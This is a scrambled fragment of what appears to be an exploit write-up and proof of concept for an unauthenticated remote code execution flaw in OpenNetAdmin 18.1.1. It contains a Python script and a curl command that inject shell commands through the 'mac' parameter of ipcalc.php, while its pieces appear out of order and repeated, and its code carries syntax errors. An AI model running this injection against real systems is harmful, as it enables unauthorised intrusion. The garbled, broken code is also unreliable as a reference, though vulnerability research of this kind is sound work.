try: r = requests.get(url, params="mac": payload, timeout=5) print("[+] Payload sent. Check /tmp/ona_test on target.") except Exception as e: print(f"[-] Failed: e")
Exploit Analysis & Proof of Concept 1. Introduction OpenNetAdmin (ONA) is an open-source network management platform providing inventory, DHCP, DNS, and configuration management. Version 18.1.1 (released circa 2018) contains a critical vulnerability allowing unauthenticated remote code execution (RCE). This paper dissects the vulnerability, its root cause, and a working exploit. opennetadmin 18.1.1 exploit
target = sys.argv[1].rstrip('/') url = f"target/ona/ipcalc.php" payload = "127.0.0.1; echo 'VULN' > /tmp/ona_test;" try: r = requests
curl "http://target/ona/ipcalc.php?mac=127.0.0.1;id" try: r = requests.get(url